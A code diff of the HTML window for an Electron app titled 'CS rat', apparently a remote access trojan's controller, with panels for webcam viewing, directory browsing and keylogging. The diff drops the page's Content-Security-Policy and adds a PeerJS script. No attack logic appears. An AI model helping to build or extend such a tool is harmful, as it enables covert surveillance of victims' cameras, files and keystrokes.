--- a/Client/Windows/MainWindow.html
+++ b/Client/Windows/MainWindow.html
@@ -2,36 +2,42 @@
 <html>
 
 <head>
-    <!--Meta Eliments-->
-    <meta http-equiv="Content-Security-Policy"
-        content="default-src 'self'; style-src 'self' 'unsafe-inline'; media-src *; img-src 'self' data: content:;">
-    <meta name="msapplication-tap-highlight" content="no">
-    <meta name="viewport" content="initial-scale=1, width=device-width">
-    <meta name="description" content="Electron app">
-    <meta name="keywords" content="none;nothing;ect;">
-    <meta name="author" content="Samuel A. Matheson">
+    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
     <meta charset="utf-8">
+    <!--<meta http-equiv="Content-Security-Policy"
+        content="default-src 'self' data: gap: https://ssl.gstatic.com 'unsafe-eval'; style-src 'self' 'unsafe-inline'; media-src *; img-src 'self' data: content:;">-->
+    <!--<meta http-equiv="Content-Security-Policy" script-src='unsafe-inline'>-->
+    <meta name="format-detection" content="telephone=no">
+    <meta name="msapplication-tap-highlight" content="no">
     <!--Style sheets-->
     <link rel="stylesheet" type="text/css" href="css/index.css">
     <!--Scripts-->
-    <script defer type="text/javascript" src="js/index.js"></script>
-    <script defer type="text/javascript" src="js/directory.js"></script>
-    <script defer type="text/javascript" src="js/webcam.js"></script>
+
     <title>CS rat</title>
 </head>
 
 <body>
+    <!-- Webcam controls -->
     <div class="view" id="webcam_view">
         <video autoplay="true" id="webcam_preview"></video>
         <button id="stop_video" class="video_btn">stop video</button>
         <button id="start_video" class="video_btn">start video</button>
     </div>
+
+    <!-- directory controls -->
     <div class="view" id="directory_view">
     </div>
 
+    <!-- Keylog controls -->
     <div class="view" id="keylog_view">
 
     </div>
+
+    <script src="https://unpkg.com/peerjs@1.3.1/dist/peerjs.min.js"></script>
+    <script type="text/javascript" src="js/index.js"></script>
+    <script type="text/javascript" src="js/peer.js"></script>
+    <script type="text/javascript" src="js/directory.js"></script>
+    <script type="text/javascript" src="js/webcam.js"></script>
 </body>
 
 </html>
